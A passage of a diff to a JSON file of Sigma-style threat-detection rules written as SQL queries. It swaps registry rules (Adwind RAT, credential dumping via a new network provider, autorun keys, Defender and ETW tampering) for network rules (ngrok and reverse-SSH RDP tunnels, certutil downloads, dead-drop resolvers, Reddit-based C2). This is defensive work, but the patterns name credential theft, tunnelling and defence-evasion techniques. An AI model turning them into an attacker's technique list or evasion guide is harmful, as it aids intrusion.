TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WebClient\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanWorkstation\\\\NetworkProvider%' ESCAPE '\\' OR TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\RDPNP\\\\NetworkProvider%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_new_network_provider.yml" + "filename": "net_connection_win_susp_prog_location_network_connection.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features - Registry", - "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "title": "Suspicious Network Connection Binary No CommandLine", + "id": "20384606-a124-4fec-acbb-8bd373728613", "status": "experimental", - "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious network connections made by a well-known Windows binary run with no command line parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion" ], @@ -32559,4350 +32605,4326 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\dllhost.exe' ESCAPE '\\')) AND NOT ((CommandLine = '') OR (CommandLine = '')))" ], - "filename": "registry_set_turn_on_dev_features.yml" + "filename": "net_connection_win_susp_binary_no_cmdline.yml" }, { - "title": "NET NGenAssemblyUsageLog Registry Key Tamper", - "id": "28036918-04d3-423d-91c0-55ecf99fb892", - "status": "experimental", - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "author": "frack113", + "title": "Remote PowerShell Session (Network)", + "id": "c539afac-c12a-46ed-b1bd-5a5567c9f045", + "status": "test", + "description": "Detects remote PowerShell connections by monitoring network outbound connections to ports 5985 or 5986 from a non-network service account.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Unknown" + "Legitimate usage of remote PowerShell, e.g. remote administration and monitoring.", + "Network Service user name of a not-covered localization" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('5985', '5986') AND Initiated = 'true') AND NOT (((User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\') OR User LIKE '%SERVICE R%' ESCAPE '\\' AND User LIKE '%SEAU%' ESCAPE '\\' OR SourceIp LIKE '0:0:%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\')) OR (SourceIp IN ('::1', '127.0.0.1') AND DestinationIp IN ('::1', '127.0.0.1'))))" ], - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" + "filename": "net_connection_win_remote_powershell_session_network.yml" }, { - "title": "Potential Persistence Via CHM Helper DLL", - "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "title": "Cmstp Making Network Connection", + "id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "status": "experimental", - "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "description": "Detects suspicious network connection by Cmstp", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1218.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND Initiated = 'true')" ], - "filename": "registry_set_persistence_chm.yml" + "filename": "net_connection_win_susp_cmstp.yml" }, { - "title": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification", - "id": "480421f9-417f-4d3b-9552-fd2728443ec8", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Potential Dead Drop Resolvers", + "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", + "status": "test", + "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", + "author": "Sorina Ionescu", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1102", + "attack.t1102.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\')) AND NOT ((NewValue LIKE '(Empty)' ESCAPE '\\' OR NewValue LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((Initiated = 'true' AND (DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\'))) AND NOT (((NewProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MsSense.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Engine.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" + "filename": "net_connection_win_dead_drop_resolvers.yml" }, { - "title": "RDP Sensitive Settings Changed to Zero", - "id": "a2863fbc-d5cb-48d5-83fb-d976d4b1743b", - "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "title": "RDP to HTTP or HTTPS Target Ports", + "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1112" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\fDenyTSConnections' ESCAPE '\\' OR TargetObject LIKE '%\\\\fSingleSessionPerUser' ESCAPE '\\' OR TargetObject LIKE '%\\\\UserAuthentication' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" ], - "filename": "registry_set_terminal_server_suspicious.yml" + "filename": "net_connection_win_rdp_to_http.yml" }, { - "title": "Wow6432Node Classes Autorun Keys Modification", - "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", - "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Connection Initiated Via Certutil.EXE", + "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "status": "experimental", + "description": "Detects a network connection initiated by the certutil.exe tool.\nAttackers can abuse the utility in order to download malware or additional payloads.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '135', '443', '445'))" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node_classes.yml" + "filename": "net_connection_win_certutil_initiated_connection.yml" }, { - "title": "Disable PUA Protection on Windows Defender", - "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", - "status": "experimental", - "description": "Detects disabling Windows Defender PUA protection", - "author": "Austin Songer @austinsonger", + "title": "Wuauclt Network Connection", + "id": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of wuauclt.exe over the network." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%wuauclt%' ESCAPE '\\' AND NOT (((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\UpdateDeploy.dll /ClassId %' ESCAPE '\\')))" ], - "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" + "filename": "net_connection_win_wuauclt_network_connection.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", - "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", - "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Epmap Connection", + "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "status": "experimental", + "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", + "author": "frack113, Tim Shelton (fps)", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.lateral_movement" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue IN ('0', 'DWORD (0x00000000)'))))" + "SELECT * FROM logs WHERE ((Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" ], - "filename": "registry_set_dot_net_etw_tamper.yml" + "filename": "net_connection_win_susp_epmap.yml" }, { - "title": "Session Manager Autorun Keys Modification", - "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "title": "Msiexec Initiated Connection", + "id": "8e5e38e4-5350-4c0b-895a-e872ce0dd54f", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001", - "attack.t1546.009" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate msiexec over networks" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" + "filename": "net_connection_win_msiexec.yml" }, { - "title": "Potential Persistence Via GlobalFlags", - "id": "36803969-5421-41ec-b92f-8500f79c23b0", - "status": "test", - "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", - "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", + "title": "Suspicious Non-Browser Network Communication With Reddit API", + "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "status": "experimental", + "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", + "author": "Gavin Knapp", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.defense_evasion", - "attack.t1546.012", - "car.2013-01-002" + "attack.command_and_control", + "attack.t1102" ], "falsepositives": [ - "Unknown" + "Legitimate applications communicating with the Reddit API e.g. web browsers not in the exclusion list, app with an RSS etc." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%reddit.com%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files 